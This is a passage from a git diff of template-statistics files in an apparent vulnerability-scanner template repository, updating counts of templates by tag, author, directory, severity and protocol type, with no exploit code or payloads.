lab","count":1},{"name":"elouhi","count":1},{"name":"sicksec","count":1},{"name":"apt-mirror","count":1},{"name":"remonsec","count":1},{"name":"blckraven","count":1},{"name":"revblock","count":1},{"name":"philippdelteil","count":1},{"name":"patralos","count":1},{"name":"schniggie","count":1},{"name":"jteles","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"droberson","count":1},{"name":"_c0wb0y_","count":1},{"name":"un-fmunozs","count":1},{"name":"thebinitghimire","count":1},{"name":"infosecsanyam","count":1},{"name":"naglinagli","count":1},{"name":"udyz","count":1},{"name":"deena","count":1},{"name":"nytr0gen","count":1},{"name":"b4uh0lz","count":1},{"name":"gboddin","count":1},{"name":"its0x08","count":1},{"name":"andysvints","count":1},{"name":"zhenwarx","count":1},{"name":"thezakman","count":1},{"name":"shreyapohekar","count":1},{"name":"sshell","count":1},{"name":"mass0ma","count":1},{"name":"streetofhackerr007","count":1},{"name":"mhdsamx","count":1},{"name":"@dwisiswant0","count":1},{"name":"florianmaak","count":1},{"name":"dahse89","count":1},{"name":"iampritam","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"notsoevilweasel","count":1},{"name":"tirtha_mandal","count":1},{"name":"elder tao","count":1},{"name":"xstp","count":1},{"name":"juicypotato1","count":1},{"name":"retr02332","count":1},{"name":"whynotke","count":1},{"name":"rojanrijal","count":1},{"name":"pdp","count":1},{"name":"ahmed sherif","count":1},{"name":"c3l3si4n","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akshansh","count":1},{"name":"@ofjaaah","count":1},{"name":"adrianmf","count":1},{"name":"_harleo","count":1},{"name":"noamrathaus","count":1},{"name":"d0rkerdevil","count":1},{"name":"andirrahmani1","count":1},{"name":"chron0x","count":1},{"name":"geraldino2","count":1},{"name":"sec_hawk","count":1},{"name":"fopina","count":1},{"name":"hakluke","count":1},{"name":"evolutionsec","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"kre80r","count":1},{"name":"shifacyclewla","count":1},{"name":"rotemreiss","count":1},{"name":"nerrorsec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0xteles","count":1},{"name":"raesene","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"berkdusunur","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"bad5ect0r","count":1},{"name":"yashanand155","count":1},{"name":"cookiehanhoan","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"knassar702","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"vzamanillo","count":1},{"name":"co0nan","count":1},{"name":"wabafet","count":1},{"name":"izn0u","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ajaysenr","count":1},{"name":"kurohost","count":1},{"name":"absshax","count":1},{"name":"0h1in9e","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ldionmarcil","count":1},{"name":"oscarintherocks","count":1},{"name":"52971","count":1},{"name":"regala_","count":1},{"name":"dawid-czarnecki","count":1},{"name":"zandros0","count":1},{"name":"b0rn2r00t","count":1},{"name":"kabirsuda","count":1},{"name":"makyotox","count":1},{"name":"willd96","count":1},{"name":"undefl0w","count":1},{"name":"orpheus","count":1},{"name":"alperenkesk","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"alex","count":1},{"name":"furkansenan","count":1},{"name":"nvn1729","count":1},{"name":"pratik khalane","count":1},{"name":"sickwell","count":1},{"name":"affix","count":1},{"name":"0xd0ff9","count":1},{"name":"borna nematzadeh","count":1},{"name":"rodnt","count":1}],"directory":[{"name":"cves","count":842},{"name":"vulnerabilities","count":329},{"name":"exposed-panels","count":278},{"name":"technologies","count":202},{"name":"exposures","count":196},{"name":"misconfiguration","count":143},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":775},{"name":"high","count":651},{"name":"medium","count":478},{"name":"critical","count":297},{"name":"low","count":156}],"types":[{"name":"http","count":2244},{"name":"file","count":50},{"name":"network","count":46},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2d10f4b6f9..ab1e9dcf49 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,926 +1,930 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | -| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | -| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | -| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 165 | zzeitlin | 63 | file | 50 | | | | | -| cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | -| cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | -| cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | -| config | 96 | ice3man | 26 | dns | 12 | | | | | +| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | +| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | +| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | +| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | +| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | +| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | +| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | +| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | +| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 166 | zzeitlin | 63 | file | 50 | | | | | +| cve2021 | 157 | madrobot | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 55 | iot | 36 | | | | | +| cve2010 | 109 | gaurang | 42 | network | 33 | | | | | +| config | 99 | philippedelteil | 30 | miscellaneous | 24 | | | | | +| cve2019 | 98 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 92 | organiccrap | 24 | fuzzing | 10 | | | | | -| apache | 73 | pr3r00t | 15 | cnvd | 9 | | | | | -| iot | 70 | sheikhrishad | 15 | headless | 5 | | | | | -| oast | 69 | milo2012 | 14 | | | | | | | +| iot | 79 | sheikhrishad | 15 | cnvd | 9 | | | | | +| apache | 73 | pr3r00t | 15 | headless | 5 | | | | | +| oast | 70 | milo2012 | 14 | | | | | | | | takeover | 69 | techbrunchfr | 13 | | | | | | | | default-login | 68 | suman_kar | 12 | | | | | | | -| token | 67 | r3dg33k | 11 | | | | | | | -| token-spray | 63 | cyllective | 11 | | | | | | | -| cve2017 | 51 | nadino | 10 | | | | | | | -| file | 50 | random_robbie | 10 | | | | | | | +| token | 67 | cyllective | 11 | | | | | | | +| token-spray | 63 | r3dg33k | 11 | | | | | | | +| cve2017 | 51 | random_robbie | 10 | | | | | | | +| file | 50 | nadino | 10 | | | | | | | | unauth | 49 | wdahlenb | 10 | | | | | | | -| network | 43 | righettod | 10 | | | | | | | -| ssrf | 42 | melbadry9 | 10 | | | | | | | +| network | 44 | melbadry9 | 10 | | | | | | | +| ssrf | 42 | righettod | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | iamthefrogy | 8 | | | | | | | -| cve2016 | 37 | zh | 8 | | | | | | | -| redirect | 37 | that_juan_ | 8 | | | | | | | -| oracle | 36 | aashiq | 8 | | | | | | | -| google | 30 | meme-lord | 7 | | | | | | | -| logs | 30 | dr_set | 7 | | | | | | | -| jira | 29 | techryptic (@tech) | 7 | | | | | | | -| cve2015 | 29 | randomstr1ng | 7 | | | | | | | -| atlassian | 29 | kophjager007 | 7 | | | | | | | -| cisco | 27 | 0x240x23elu | 7 | | | | | | | -| cve2014 | 27 | harshbothra_ | 7 | | | | | | | +| | 39 | that_juan_ | 8 | | | | | | | +| redirect | 38 | zh | 8 | | | | | | | +| cve2016 | 38 | aashiq | 8 | | | | | | | +| oracle | 37 | iamthefrogy | 8 | | | | | | | +| google | 30 | harshbothra_ | 7 | | | | | | | +| logs | 30 | randomstr1ng | 7 | | | | | | | +| jira | 29 | oppsec | 7 | | | | | | | +| atlassian | 29 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 29 | techryptic (@tech) | 7 | | | | | | | | listing | 27 | dogasantos | 7 | | | | | | | -| generic | 24 | oppsec | 7 | | | | | | | -| misc | 23 | emadshanab | 7 | | | | | | | -| auth-bypass | 23 | logicalhunter | 6 | | | | | | | +| cisco | 27 | meme-lord | 7 | | | | | | | +| cve2014 | 27 | dr_set | 7 | | | | | | | +| generic | 24 | kophjager007 | 7 | | | | | | | +| auth-bypass | 24 | emadshanab | 7 | | | | | | | +| misconfig | 23 | logicalhunter | 6 | | | | | | | +| misc | 23 | __fazal | 6 | | | | | | | | disclosure | 23 | pentest_swissky | 6 | | | | | | | -| router | 22 | divya_mudgal | 6 | | | | | | | -| misconfig | 22 | caspergn | 6 | | | | | | | -| aem | 19 | __fazal | 6 | | | | | | | -| cve2012 | 18 | puzzlepeaches | 6 | | | | | | | -| debug | 18 | elsfa7110 | 5 | | | | | | | -| springboot | 18 | iamnoooob | 5 | | | | | | | -| sap | 18 | johnk3r | 5 | | | | | | | -| php | 16 | rootxharsh | 5 | | | | | | | -| cve2011 | 15 | panch0r3d | 5 | | | | | | | -| devops | 15 | ganofins | 5 | | | | | | | -| login | 14 | yanyun | 5 | | | | | | | -| cve2009 | 14 | joanbono | 5 | | | | | | | -| aws | 14 | lu4nx | 5 | | | | | | | -| struts | 14 | xelkomy | 5 | | | | | | | -| weblogic | 14 | incogbyte | 4 | | | | | | | -| fuzz | 14 | e_schultze_ | 4 | | | | | | | +| router | 22 | caspergn | 6 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| springboot | 18 | divya_mudgal | 6 | | | | | | | +| cve2012 | 18 | panch0r3d | 5 | | | | | | | +| sap | 18 | rootxharsh | 5 | | | | | | | +| debug | 17 | johnk3r | 5 | | | | | | | +| weblogic | 15 | yanyun | 5 | | | | | | | +| cve2011 | 15 | iamnoooob | 5 | | | | | | | +| php | 15 | elsfa7110 | 5 | | | | | | | +| devops | 15 | lu4nx | 5 | | | | | | | +| login | 14 | ganofins | 5 | | | | | | | +| cve2009 | 14 | xelkomy | 5 | | | | | | | +| aws | 14 | joanbono | 5 | | | | | | | +| struts | 14 | e_schultze_ | 4 | | | | | | | +| fuzz | 14 | incogbyte | 4 | | | | | | | +| android | 13 | nodauf | 4 | | | | | | | +| deserialization | 13 | tess | 4 | | | | | | | | zoho | 13 | wisnupramoedya | 4 | | | | | | | -| deserialization | 13 | nodauf | 4 | | | | | | | | adobe | 13 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | tess | 4 | | | | | | | -| dlink | 13 | 0w4ys | 3 | | | | | | | -| dns | 13 | me9187 | 3 | | | | | | | -| jenkins | 12 | f1tz | 3 | | | | | | | -| manageengine | 12 | shifacyclewala | 3 | | | | | | | -| wp-theme | 12 | z3bd | 3 | | | | | | | -| magento | 11 | idealphase | 3 | | | | | | | -| cve2013 | 11 | yash anand @yashanand155 | 3 | | | | | | | -| xxe | 10 | binaryfigments | 3 | | | | | | | -| dell | 10 | mavericknerd | 3 | | | | | | | -| intrusive | 10 | shine | 3 | | | | | | | -| hp | 10 | jarijaas | 3 | | | | | | | -| kubernetes | 9 | dudez | 3 | | | | | | | -| vmware | 9 | unstabl3 | 3 | | | | | | | -| ftp | 9 | _generic_human_ | 3 | | | | | | | -| gitlab | 8 | fyoorer | 3 | | | | | | | -| cnvd | 8 | sushantkamble | 3 | | | | | | | -| ruijie | 8 | johnjhacking | 3 | | | | | | | -| airflow | 8 | impramodsargar | 3 | | | | | | | -| microsoft | 8 | vsh00t | 3 | | | | | | | -| nginx | 8 | emenalf | 3 | | | | | | | -| scada | 8 | sullo | 3 | | | | | | | -| fastjson | 8 | skeltavik | 3 | | | | | | | -| cve2008 | 8 | thomas_from_offensity | 3 | | | | | | | -| rails | 8 | dheerajmadhukar | 2 | | | | | | | -| backup | 8 | bp0lr | 2 | | | | | | | -| ibm | 8 | gal nagli | 2 | | | | | | | -| confluence | 7 | r12w4n | 2 | | | | | | | -| files | 7 | swissky | 2 | | | | | | | -| cms | 7 | kiblyn11 | 2 | | | | | | | -| coldfusion | 7 | socketz | 2 | | | | | | | -| netgear | 7 | bsysop | 2 | | | | | | | -| nodejs | 6 | random-robbie | 2 | | | | | | | -| camera | 6 | udit_thakkur | 2 | | | | | | | -| laravel | 6 | gevakun | 2 | | | | | | | -| citrix | 6 | vavkamil | 2 | | | | | | | +| dlink | 13 | emenalf | 3 | | | | | | | +| dns | 13 | yash anand @yashanand155 | 3 | | | | | | | +| wp-theme | 12 | binaryfigments | 3 | | | | | | | +| jenkins | 12 | mavericknerd | 3 | | | | | | | +| manageengine | 12 | sushantkamble | 3 | | | | | | | +| xxe | 11 | fyoorer | 3 | | | | | | | +| magento | 11 | f1tz | 3 | | | | | | | +| cve2013 | 11 | impramodsargar | 3 | | | | | | | +| hp | 10 | 0w4ys | 3 | | | | | | | +| intrusive | 10 | me9187 | 3 | | | | | | | +| dell | 10 | sullo | 3 | | | | | | | +| kubernetes | 9 | johnjhacking | 3 | | | | | | | +| ftp | 9 | vsh00t | 3 | | | | | | | +| vmware | 9 | shine | 3 | | | | | | | +| ruijie | 8 | idealphase | 3 | | | | | | | +| cnvd | 8 | unstabl3 | 3 | | | | | | | +| backup | 8 | shifacyclewala | 3 | | | | | | | +| cve2008 | 8 | z3bd | 3 | | | | | | | +| ibm | 8 | dudez | 3 | | | | | | | +| fastjson | 8 | _generic_human_ | 3 | | | | | | | +| nginx | 8 | jarijaas | 3 | | | | | | | +| airflow | 8 | skeltavik | 3 | | | | | | | +| rails | 8 | thomas_from_offensity | 3 | | | | | | | +| gitlab | 8 | 0xprial | 2 | | | | | | | +| microsoft | 8 | w4cky_ | 2 | | | | | | | +| scada | 8 | ree4pwn | 2 | | | | | | | +| files | 7 | hahwul | 2 | | | | | | | +| confluence | 7 | huowuzhao | 2 | | | | | | | +| cms | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| netgear | 7 | ehsahil | 2 | | | | | | | +| coldfusion | 7 | gal nagli | 2 | | | | | | | +| rconfig | 6 | afaq | 2 | | | | | | | | api | 6 | 0xelkomy | 2 | | | | | | | -| phpmyadmin | 6 | koti2 | 2 | | | | | | | -| solr | 6 | whoever | 2 | | | | | | | -| django | 6 | moritz nentwig | 2 | | | | | | | -| jetty | 6 | 0xrudra | 2 | | | | | | | -| drupal | 6 | huowuzhao | 2 | | | | | | | -| lucee | 6 | nkxxkn | 2 | | | | | | | -| docker | 6 | lotusdll | 2 | | | | | | | -| rconfig | 6 | fabaff | 2 | | | | | | | -| fileupload | 6 | g4l1t0 | 2 | | | | | | | -| java | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| headless | 5 | manas_harsh | 2 | | | | | | | -| tomcat | 5 | hahwul | 2 | | | | | | | -| circarlife | 5 | amsda | 2 | | | | | | | -| windows | 5 | hetroublemakr | 2 | | | | | | | -| jolokia | 5 | zomsop82 | 2 | | | | | | | -| crlf | 5 | bernardofsr | 2 | | | | | | | -| dedecms | 5 | randomrobbie | 2 | | | | | | | -| printer | 5 | alifathi-h1 | 2 | | | | | | | -| iis | 5 | sy3omda | 2 | | | | | | | -| ssti | 5 | 0xcrypto | 2 | | | | | | | -| vpn | 4 | ehsahil | 2 | | | | | | | -| slack | 4 | mohammedsaneem | 2 | | | | | | | -| artifactory | 4 | 0xprial | 2 | | | | | | | -| npm | 4 | 0xsmiley | 2 | | | | | | | -| samsung | 4 | davidmckennirey | 2 | | | | | | | -| zabbix | 4 | ree4pwn | 2 | | | | | | | -| exchange | 4 | convisoappsec | 2 | | | | | | | -| thinkcmf | 4 | r3naissance | 2 | | | | | | | -| asp | 4 | 0xsapra | 2 | | | | | | | -| rfi | 4 | afaq | 2 | | | | | | | -| proxy | 4 | x1m_martijn | 2 | | | | | | | -| strapi | 4 | w4cky_ | 2 | | | | | | | -| magmi | 4 | foulenzer | 2 | | | | | | | -| firebase | 4 | arcc | 2 | | | | | | | -| wso2 | 4 | bing0o | 2 | | | | | | | -| symantec | 4 | pxmme1337 | 2 | | | | | | | -| glpi | 4 | cocxanh | 2 | | | | | | | -| thinkphp | 4 | joeldeleep | 2 | | | | | | | -| buffalo | 4 | parth | 2 | | | | | | | -| webserver | 4 | flag007 | 1 | | | | | | | -| moodle | 4 | ajaysenr | 1 | | | | | | | -| fatpipe | 4 | nytr0gen | 1 | | | | | | | -| keycloak | 4 | micha3lb3n | 1 | | | | | | | -| resin | 4 | makyotox | 1 | | | | | | | -| solarwinds | 4 | manuelbua | 1 | | | | | | | -| amazon | 4 | clarkvoss | 1 | | | | | | | -| grafana | 4 | iampritam | 1 | | | | | | | -| zimbra | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| firmware | 4 | dawid-czarnecki | 1 | | | | | | | -| elastic | 4 | absshax | 1 | | | | | | | -| symfony | 4 | notsoevilweasel | 1 | | | | | | | -| git | 4 | akash.c | 1 | | | | | | | -| hongdian | 4 | shifacyclewla | 1 | | | | | | | -| maps | 4 | aceseven (digisec360) | 1 | | | | | | | -| traversal | 4 | shreyapohekar | 1 | | | | | | | -| ebs | 3 | kba@sogeti_esec | 1 | | | | | | | -| zhiyuan | 3 | ratnadip gajbhiye | 1 | | | | | | | -| cve2007 | 3 | hanlaomo | 1 | | | | | | | -| ofbiz | 3 | sshell | 1 | | | | | | | +| laravel | 6 | hetroublemakr | 2 | | | | | | | +| nodejs | 6 | arcc | 2 | | | | | | | +| fileupload | 6 | manas_harsh | 2 | | | | | | | +| solr | 6 | kiblyn11 | 2 | | | | | | | +| citrix | 6 | zomsop82 | 2 | | | | | | | +| jetty | 6 | x1m_martijn | 2 | | | | | | | +| camera | 6 | koti2 | 2 | | | | | | | +| docker | 6 | pxmme1337 | 2 | | | | | | | +| drupal | 6 | randomrobbie | 2 | | | | | | | +| lucee | 6 | alifathi-h1 | 2 | | | | | | | +| prometheus | 6 | bp0lr | 2 | | | | | | | +| django | 6 | random-robbie | 2 | | | | | | | +| phpmyadmin | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| wso2 | 5 | lotusdll | 2 | | | | | | | +| circarlife | 5 | r12w4n | 2 | | | | | | | +| printer | 5 | bernardofsr | 2 | | | | | | | +| ssti | 5 | foulenzer | 2 | | | | | | | +| crlf | 5 | bing0o | 2 | | | | | | | +| windows | 5 | gevakun | 2 | | | | | | | +| jolokia | 5 | whoever | 2 | | | | | | | +| tomcat | 5 | vavkamil | 2 | | | | | | | +| java | 5 | convisoappsec | 2 | | | | | | | +| dedecms | 5 | r3naissance | 2 | | | | | | | +| symfony | 5 | mohammedsaneem | 2 | | | | | | | +| iis | 5 | parth | 2 | | | | | | | +| headless | 5 | 0xsmiley | 2 | | | | | | | +| asp | 4 | moritz nentwig | 2 | | | | | | | +| moodle | 4 | joeldeleep | 2 | | | | | | | +| resin | 4 | bsysop | 2 | | | | | | | +| traversal | 4 | davidmckennirey | 2 | | | | | | | +| maps | 4 | socketz | 2 | | | | | | | +| strapi | 4 | nkxxkn | 2 | | | | | | | +| slack | 4 | 0xrudra | 2 | | | | | | | +| elastic | 4 | cocxanh | 2 | | | | | | | +| thinkphp | 4 | sy3omda | 2 | | | | | | | +| artifactory | 4 | udit_thakkur | 2 | | | | | | | +| grafana | 4 | 0xcrypto | 2 | | | | | | | +| microstrategy | 4 | dheerajmadhukar | 2 | | | | | | | +| proxy | 4 | amsda | 2 | | | | | | | +| magmi | 4 | fabaff | 2 | | | | | | | +| npm | 4 | 0xsapra | 2 | | | | | | | +| firebase | 4 | g4l1t0 | 2 | | | | | | | +| glpi | 4 | swissky | 2 | | | | | | | +| symantec | 4 | undefl0w | 1 | | | | | | | +| hongdian | 4 | schniggie | 1 | | | | | | | +| git | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| exchange | 4 | lark lab | 1 | | | | | | | +| firmware | 4 | alph4byt3 | 1 | | | | | | | +| fatpipe | 4 | apt-mirror | 1 | | | | | | | +| solarwinds | 4 | @ofjaaah | 1 | | | | | | | +| zabbix | 4 | thezakman | 1 | | | | | | | +| amazon | 4 | ilovebinbash | 1 | | | | | | | +| zimbra | 4 | naglinagli | 1 | | | | | | | +| samsung | 4 | gboddin | 1 | | | | | | | +| webserver | 4 | alex | 1 | | | | | | | +| rfi | 4 | xstp | 1 | | | | | | | +| vpn | 4 | nvn1729 | 1 | | | | | | | +| buffalo | 4 | ringo | 1 | | | | | | | +| keycloak | 4 | jrolf | 1 | | | | | | | +| thinkcmf | 4 | jteles | 1 | | | | | | | +| telerik | 3 | qlkwej | 1 | | | | | | | +| kafka | 3 | fmunozs | 1 | | | | | | | +| openam | 3 | bolli95 | 1 | | | | | | | +| kevinlab | 3 | 0xrod | 1 | | | | | | | +| bitrix | 3 | mass0ma | 1 | | | | | | | +| lfr | 3 | flag007 | 1 | | | | | | | +| search | 3 | exploitation | 1 | | | | | | | +| targa | 3 | adrianmf | 1 | | | | | | | +| fanruan | 3 | shifacyclewla | 1 | | | | | | | +| ssh | 3 | iampritam | 1 | | | | | | | +| minio | 3 | s1r1u5_ | 1 | | | | | | | +| azure | 3 | izn0u | 1 | | | | | | | +| injection | 3 | micha3lb3n | 1 | | | | | | | +| nexus | 3 | affix | 1 | | | | | | | +| backdoor | 3 | florianmaak | 1 | | | | | | | +| cloud | 3 | willd96 | 1 | | | | | | | +| sonicwall | 3 | rotemreiss | 1 | | | | | | | +| itop | 3 | evolutionsec | 1 | | | | | | | +| jeesns | 3 | philippdelteil | 1 | | | | | | | +| ofbiz | 3 | revblock | 1 | | | | | | | +| openssh | 3 | andysvints | 1 | | | | | | | +| exposures | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| opensis | 3 | manuelbua | 1 | | | | | | | +| linkerd | 3 | wabafet | 1 | | | | | | | +| log | 3 | sshell | 1 | | | | | | | +| tikiwiki | 3 | pdp | 1 | | | | | | | +| node | 3 | regala_ | 1 | | | | | | | +| cacti | 3 | x6263 | 1 | | | | | | | +| mongodb | 3 | elder tao | 1 | | | | | | | +| springcloud | 3 | shreyapohekar | 1 | | | | | | | +| caucho | 3 | oscarintherocks | 1 | | | | | | | +| ebs | 3 | zandros0 | 1 | | | | | | | +| cves | 3 | _harleo | 1 | | | | | | | +| oa | 3 | igibanez | 1 | | | | | | | +| r-seenet | 3 | pudsec | 1 | | | | | | | +| hoteldruid | 3 | nytr0gen | 1 | | | | | | | +| vbulletin | 3 | clarkvoss | 1 | | | | | | | +| nosqli | 3 | mhdsamx | 1 | | | | | | | +| mail | 3 | juicypotato1 | 1 | | | | | | | +| httpd | 3 | borna nematzadeh | 1 | | | | | | | +| bigip | 3 | nerrorsec | 1 | | | | | | | +| github | 3 | _c0wb0y_ | 1 | | | | | | | | terramaster | 3 | tirtha_mandal | 1 | | | | | | | -| opensis | 3 | philippdelteil | 1 | | | | | | | -| r-seenet | 3 | ringo | 1 | | | | | | | -| cves | 3 | bolli95 | 1 | | | | | | | -| targa | 3 | mass0ma | 1 | | | | | | | -| kibana | 3 | zhenwarx | 1 | | | | | | | -| mail | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| smtp | 3 | nerrorsec | 1 | | | | | | | -| fpd | 3 | xstp | 1 | | | | | | | -| backdoor | 3 | rodnt | 1 | | | | | | | -| openam | 3 | 0xrod | 1 | | | | | | | -| azure | 3 | j33n1k4 | 1 | | | | | | | -| fanruan | 3 | fmunozs | 1 | | | | | | | -| springcloud | 3 | c3l3si4n | 1 | | | | | | | -| lfr | 3 | orpheus | 1 | | | | | | | -| cacti | 3 | 0ut0fb4nd | 1 | | | | | | | -| microstrategy | 3 | geraldino2 | 1 | | | | | | | -| vbulletin | 3 | berkdusunur | 1 | | | | | | | -| cloud | 3 | th3.d1p4k | 1 | | | | | | | -| log | 3 | infosecsanyam | 1 | | | | | | | -| telerik | 3 | co0nan | 1 | | | | | | | -| nosqli | 3 | ilovebinbash | 1 | | | | | | | -| bitrix | 3 | apt-mirror | 1 | | | | | | | -| openssh | 3 | kre80r | 1 | | | | | | | -| lansweeper | 3 | elmahdi | 1 | | | | | | | -| hoteldruid | 3 | pratik khalane | 1 | | | | | | | -| node | 3 | adrianmf | 1 | | | | | | | -| jellyfin | 3 | izn0u | 1 | | | | | | | -| kafka | 3 | _c0wb0y_ | 1 | | | | | | | -| mongodb | 3 | regala_ | 1 | | | | | | | -| github | 3 | ohlinge | 1 | | | | | | | -| prometheus | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| exposures | 3 | tim_koopmans | 1 | | | | | | | -| itop | 3 | thevillagehacker | 1 | | | | | | | -| kevinlab | 3 | s1r1u5_ | 1 | | | | | | | -| search | 3 | raesene | 1 | | | | | | | -| httpd | 3 | _darrenmartyn | 1 | | | | | | | -| linkerd | 3 | sicksec | 1 | | | | | | | -| tikiwiki | 3 | pudsec | 1 | | | | | | | -| druid | 3 | sec_hawk | 1 | | | | | | | -| nacos | 3 | un-fmunozs | 1 | | | | | | | -| oa | 3 | smaranchand | 1 | | | | | | | -| jeesns | 3 | d0rkerdevil | 1 | | | | | | | -| nexus | 3 | kareemse1im | 1 | | | | | | | -| bigip | 3 | juicypotato1 | 1 | | | | | | | -| ssh | 3 | shelld3v | 1 | | | | | | | -| caucho | 3 | yashgoti | 1 | | | | | | | -| injection | 3 | droberson | 1 | | | | | | | -| mida | 2 | yavolo | 1 | | | | | | | -| totemomail | 2 | bernardo rodrigues | 1 | | | | | | | +| zhiyuan | 3 | d0rkerdevil | 1 | | | | | | | +| nacos | 3 | becivells | 1 | | | | | | | +| cve2007 | 3 | un-fmunozs | 1 | | | | | | | +| lansweeper | 3 | 0xtavian | 1 | | | | | | | +| kibana | 3 | j33n1k4 | 1 | | | | | | | +| smtp | 3 | cookiehanhoan | 1 | | | | | | | +| fpd | 3 | ahmed sherif | 1 | | | | | | | +| jellyfin | 3 | elmahdi | 1 | | | | | | | +| druid | 3 | hanlaomo | 1 | | | | | | | +| cache | 2 | elouhi | 1 | | | | | | | +| oauth | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| openvpn | 2 | yashgoti | 1 | | | | | | | +| trixbox | 2 | droberson | 1 | | | | | | | +| vcenter | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| nagios | 2 | yavolo | 1 | | | | | | | +| akamai | 2 | thevillagehacker | 1 | | | | | | | +| natshell | 2 | kba@sogeti_esec | 1 | | | | | | | +| grav | 2 | dahse89 | 1 | | | | | | | +| spark | 2 | aresx | 1 | | | | | | | +| icewarp | 2 | ohlinge | 1 | | | | | | | +| hjtcloud | 2 | bad5ect0r | 1 | | | | | | | +| flir | 2 | daviey | 1 | | | | | | | +| prtg | 2 | retr02332 | 1 | | | | | | | +| ecoa | 2 | taielab | 1 | | | | | | | +| favicon | 2 | kurohost | 1 | | | | | | | +| qihang | 2 | lethargynavigator | 1 | | | | | | | +| aspose | 2 | infosecsanyam | 1 | | | | | | | +| chamilo | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| ilo | 2 | ratnadip gajbhiye | 1 | | | | | | | +| places | 2 | sec_hawk | 1 | | | | | | | +| getsimple | 2 | furkansenan | 1 | | | | | | | +| showdoc | 2 | @dwisiswant0 | 1 | | | | | | | +| leak | 2 | 52971 | 1 | | | | | | | +| text | 2 | streetofhackerr007 | 1 | | | | | | | +| liferay | 2 | fopina | 1 | | | | | | | +| axis | 2 | makyotox | 1 | | | | | | | +| kentico | 2 | th3.d1p4k | 1 | | | | | | | +| glassfish | 2 | deena | 1 | | | | | | | +| couchdb | 2 | jeya seelan | 1 | | | | | | | +| dolibarr | 2 | kabirsuda | 1 | | | | | | | +| yapi | 2 | defr0ggy | 1 | | | | | | | +| shellshock | 2 | geraldino2 | 1 | | | | | | | +| dos | 2 | 0xd0ff9 | 1 | | | | | | | +| mailchimp | 2 | sickwell | 1 | | | | | | | +| s3 | 2 | yashanand155 | 1 | | | | | | | +| nextcloud | 2 | mesaglio | 1 | | | | | | | +| linux | 2 | akash.c | 1 | | | | | | | +| sonarqube | 2 | sicksec | 1 | | | | | | | +| middleware | 2 | sbani | 1 | | | | | | | +| payara | 2 | push4d | 1 | | | | | | | +| sharepoint | 2 | its0x08 | 1 | | | | | | | +| voipmonitor | 2 | blckraven | 1 | | | | | | | +| vrealize | 2 | 0h1in9e | 1 | | | | | | | +| igs | 2 | akshansh | 1 | | | | | | | +| storage | 2 | orpheus | 1 | | | | | | | +| plesk | 2 | zhenwarx | 1 | | | | | | | +| embed | 2 | whynotke | 1 | | | | | 